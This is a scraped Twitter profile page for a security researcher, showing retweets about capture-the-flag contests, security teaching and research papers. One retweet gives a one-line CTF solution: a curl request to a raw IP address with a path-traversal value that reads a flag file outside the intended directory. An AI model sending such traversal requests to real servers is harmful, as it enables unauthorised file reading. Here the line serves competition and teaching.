Georg Merzdovnik

@gmerzdovnik

PhD in InfoSec; ; playing around with hardware also...

Vrijeme pridruživanja: ožujak 2015.

Tweetovi

Blokirali ste korisnika/cu @gmerzdovnik

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @gmerzdovnik

  1. proslijedio/la je Tweet
    23. stu 2019.

    9th place at with from & , we involved so many students this year and they loved it! This is my 10th RuCTFe, thank you for all these years ♥️ Gg to Bushwhackers and Corrupted Lights for ruling the scoreboard!

    Poništi
  2. proslijedio/la je Tweet
    23. stu 2019.
    Poništi
  3. proslijedio/la je Tweet
    14. lis 2019.

    Tweet-contained solution in collab with to Buggy .Net challenge by curl -X GET -d 't=<s&filename=../../FLAG.txt' 52.197.162.211 Technique inspired from but no encoding trickeries needed here 🚩

    Poništi
  4. proslijedio/la je Tweet
    15. lis 2019.

    Here we go, bootstrapping our new Capture the Flag SE lecture at in collaboration with 🚩 Me training 40 security padawans, it's gonna be fun 👾

    Poništi
  5. proslijedio/la je Tweet
    8. lis 2019.

    Kick-off of the web security reading group, a joint research initiative of the Security and Privacy research unit ⁦⁩ and ⁦⁩ ⁦First talk by ⁦

    Poništi
  6. proslijedio/la je Tweet
    25. svi 2019.
    Poništi
  7. proslijedio/la je Tweet
    16. ožu 2019.

    First CTF with the team and straight into 2nd place at ! Thanks to for the warm welcome, it was plenty of fun to hack together and learn some TI-83+ assembly 🧮

    Poništi
  8. proslijedio/la je Tweet
    16. ožu 2019.

    We had a great time playing yesterday, scoring the 2nd place. After a bumpy start it went quite well for us in the end. ;)

    Poništi
  9. proslijedio/la je Tweet
    15. pro 2018.

    A bit late, but today we finally honored the gods. Here's our pasta & meatballs from scratch featuring and @stiefel@chaos.social CC:

    Poništi
  10. proslijedio/la je Tweet
    11. tra 2018.

    W0Y delegation welcomed at Yekatarinburg airport by our wonderful guides!

    Poništi
  11. proslijedio/la je Tweet
    23. ožu 2018.
    Poništi
  12. proslijedio/la je Tweet
    5. velj 2018.
    Poništi
  13. proslijedio/la je Tweet
    28. pro 2017.

    Our new post about some nifty bytecode debugging tricks with is out. Happy holidays everyone!

    Poništi
  14. proslijedio/la je Tweet
    25. pro 2017.
    Poništi
  15. proslijedio/la je Tweet
    17. pro 2017.

    New blog! Remote LD_PRELOAD exploitation by dan

    Poništi
  16. proslijedio/la je Tweet
    9. pro 2017.

    x86-64 Windows Jurassic Park Payload

    Poništi
  17. proslijedio/la je Tweet
    6. pro 2017.

    The ACM paywall for proceedings was lifted for the duration of the conference:

    Poništi
  18. proslijedio/la je Tweet
    4. pro 2017.
    Poništi
  19. proslijedio/la je Tweet
    28. stu 2017.

    Next week at , I present & mine paper on non-smart power grid hacking: Can a common botnet trip a continental-sized power grid by producing load spikes? Yes, for continental Europe, its 2.5-10 Mio bots.

    Poništi
  20. proslijedio/la je Tweet
    28. stu 2017.

    Fun fact: Back in the DOS era, you could install a monochrome video card, and use it at the same time as the main display. This was an early way to do dual monitors, so it was helpful for debugging fullscreen games. Command & Conquer, for example, shows a lot of internal info!

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·